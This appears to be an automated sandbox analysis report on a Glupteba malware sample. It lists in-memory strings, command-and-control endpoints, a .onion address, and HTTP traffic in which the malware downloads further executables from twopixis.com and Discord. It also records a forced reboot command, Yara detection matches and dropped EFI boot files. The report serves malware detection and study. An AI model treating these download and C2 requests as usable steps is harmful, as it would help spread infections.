        Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duniadekho.bar
        Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duniadekho.barMicrosoft
        Source: csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duniadekho.barSETCONF
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duniadekho.barTransfer-Encodingtworkpoll
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duniadekho.barhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionCommonPro
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com
        Source: csrss.exe, 00000014.00000003.210658786957.000000000C805000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210654541812.000000000C8A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exe
        Source: csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210616640622.000000000D764000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ameshkov/dnslookup/
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.comW
        Source: csrss.exe, 00000014.00000003.210653294128.000000000C950000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210671924295.000000000C4BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/350494541/0257ea00-a853
        Source: csrss.exe, 00000014.00000003.210653914185.000000000C90E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar
        Source: csrss.exe, 00000014.00000003.211839807582.000000000C4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581
        Source: csrss.exe, 00000014.00000003.210667598347.000000000C5EA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar/api/poll
        Source: csrss.exe, 00000014.00000003.210659966591.000000000C7BE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar/api/restriction-us
        Source: csrss.exe, 00000014.00000003.210659966591.000000000C7BE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar/api/restriction-usH2
        Source: csrss.exe, 00000014.00000003.209395939200.000000000C624000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar/api/signature/
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031e
        Source: csrss.exe, 00000014.00000003.210658786957.000000000C805000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.barH
        Source: csrss.exe, 00000014.00000003.210659083983.000000000C7FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bararch=64-bit&build_number=19042&Intel%28R%29
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
        Source: csrss.exe, 00000014.00000003.213017406273.000000000C52C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210668268821.000000000C5AC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209403091208.000000000C5C4000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213015280823.000000000C5AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twopixis.com/watchdog
        Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twopixis.com/watchdog/watchdog.exe
        Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twopixis.com/watchdog/watchdog.exeSETCONF
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twopixis.com/watchdog/watchdog.exeno-store
        Source: csrss.exe, 00000014.00000003.209403091208.000000000C5F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error
        Source: csrss.exe, 00000014.00000003.213015103821.000000000C5F2000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213019914167.000000000C460000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211840953641.000000000C45E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209403091208.000000000C5F0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209393805620.000000000C6D8000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210667163276.000000000C5EE000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213017192448.000000000C544000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
        Source: unknownHTTP traffic detected: POST /api/restriction-us HTTP/1.1Host: server5.duniadekho.barUser-Agent: Go-http-client/1.1Content-Length: 152Content-Type: application/x-www-form-urlencodedVersion: 195Accept-Encoding: gzip
        Source: unknownDNS traffic detected: queries for: ec87b504-92ea-4d22-a937-161700799581.uuid.duniadekho.bar
        Source: global trafficHTTP traffic detected: GET /attachments/1087398815188910163/1087399133926674453/LZ.zip HTTP/1.1Host: cdn.discordapp.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581 HTTP/1.1Host: server5.duniadekho.barUser-Agent: Go-http-client/1.1Version: 195Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /watchdog/watchdog.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Uuid: ec87b504-92ea-4d22-a937-161700799581Version: 195Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /api/signature/21f67ca2e1b8b0405399c65a0e0d031e HTTP/1.1Host: server5.duniadekho.barUser-Agent: Go-http-client/1.1Uuid: ec87b504-92ea-4d22-a937-161700799581Version: 195Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/350494541/0257ea00-a853-11eb-8659-1a96e3eed860?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230528%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230528T093319Z&X-Amz-Expires=300&X-Amz-Signature=25a5fa811961f6d4a9ae1ad0a06038ccbf899e81292d2f437487b8af95f18898&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=350494541&response-content-disposition=attachment%3B%20filename%3Dopera-proxy.windows-386.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeAccept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /watchdog/watchdog.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Uuid: ec87b504-92ea-4d22-a937-161700799581Version: 195Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /w/w-8-debug.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /gm-305-7507ffc9a340f774985cb5ca11ca78c4.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

        E-Banking Fraud

        barindex
        Yara detected Glupteba
        Source: Yara matchFile source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR

        System Summary

        barindex
        Uses shutdown.exe to shutdown or reboot the system
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: kdsyitkxmS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 58.3.csrss.exe.4331420.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 61.3.csrss.exe.4331420.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 10.3.kdsyitkxmS.exe.40e1420.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 23.3.csrss.exe.4331420.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 31.3.csrss.exe.431bb00.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 20.3.csrss.exe.4321700.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 55.3.csrss.exe.4321700.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 55.3.csrss.exe.4331420.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 10.3.kdsyitkxmS.exe.40d1700.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 40.3.csrss.exe.431bb00.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 23.3.csrss.exe.4321700.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 20.3.csrss.exe.3d00000.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 10.3.kdsyitkxmS.exe.3ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 43.3.csrss.exe.4331420.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 40.3.csrss.exe.3d00000.5.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 43.3.csrss.exe.3d00000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 40.3.csrss.exe.4331420.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 20.3.csrss.exe.431bb00.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 43.3.csrss.exe.431bb00.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 55.3.csrss.exe.431bb00.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 61.3.csrss.exe.4321700.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 61.3.csrss.exe.431bb00.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 20.3.csrss.exe.4331420.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 4.3.kdsyitkxmS.exe.40abb00.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 50.3.csrss.exe.4321700.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 0000003A.00000003.208966850463.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 0000003D.00000003.209030995606.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 00000037.00000003.208942288673.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_by2l5cwc.djl.ps1
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeFile created: C:\Windows\rssJump to behavior
        Source: bootx64.efi.20.drStatic PE information: No import functions for PE file found
        Source: bootmgfw.efi.20.drStatic PE information: No import functions for PE file found
        Source: EfiGuardDxe.efi.20.drStatic PE information: No import functions for PE file found
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDBGHELP.DLLj% vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesymsrv.dllj% vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinmonFS.sysZ vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedsefix.exe. vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDBGHELP.DLLj% vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesymsrv.dllj% vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinmonFS.sysZ vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedsefix.exe. vs kdsyitkxmS.exe
        Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeSection loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\servicing\TrustedInstaller.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeSection loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\netsh.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
